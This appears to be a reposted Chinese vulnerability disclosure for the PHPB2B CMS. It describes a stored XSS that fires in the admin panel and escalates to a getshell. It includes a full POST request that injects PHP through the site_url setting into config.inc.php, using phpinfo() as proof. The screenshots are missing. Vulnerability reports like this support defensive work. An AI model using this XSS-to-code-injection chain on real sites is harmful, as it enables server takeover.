PHPB2B存储xss+getshell

  • A+
所属分类:漏洞时代
摘要

PHPB2B 存在多处xss。
可盲打后台且getshell。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip


漏洞作者: darker

PHPB2B 存在多处xss。
可盲打后台且getshell。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip

详细说明:

ex:

发布供求信息

PHPB2B存储xss+getshell

 

管理后台审核供求信息:

PHPB2B存储xss+getshell

 
执行post操作

data[Bsetting][site_url] 存在configs/config.inc.php中。

修改site_url为//';phpinfo();//

pkav.post("http://localhost/phpb2b/pb-admin/setting.php?do=basic","data%5Bsetting%5D%5Bsite_name%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F&data%5Bsetting%5D%5Bsite_title%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91+-+Powered+By+PHPB2B&data%5Bsetting%5D%5Bsite_banner_word%5D=%E6%9C%80%E4%B8%93%E4%B8%9A%E7%9A%84%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99&data%5Bsetting%5D%5Bsite_logo%5D=static%2Fimages%2Flogo.jpg&data%5Bsetting%5D%5Bsite_url%5D=//';phpinfo();//%2F&data%5Bsetting%5D%5Bicp_number%5D=ICP%E5%A4%87%E6%A1%88%E5%8F%B7%E7%A0%81&savebasic=%E6%8F%90%E4%BA%A4",function(rs){});

成功写入configs/config.inc.php

漏洞证明:

写入配置文件

PHPB2B存储xss+getshell

 

成功执行:

PHPB2B存储xss+getshell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: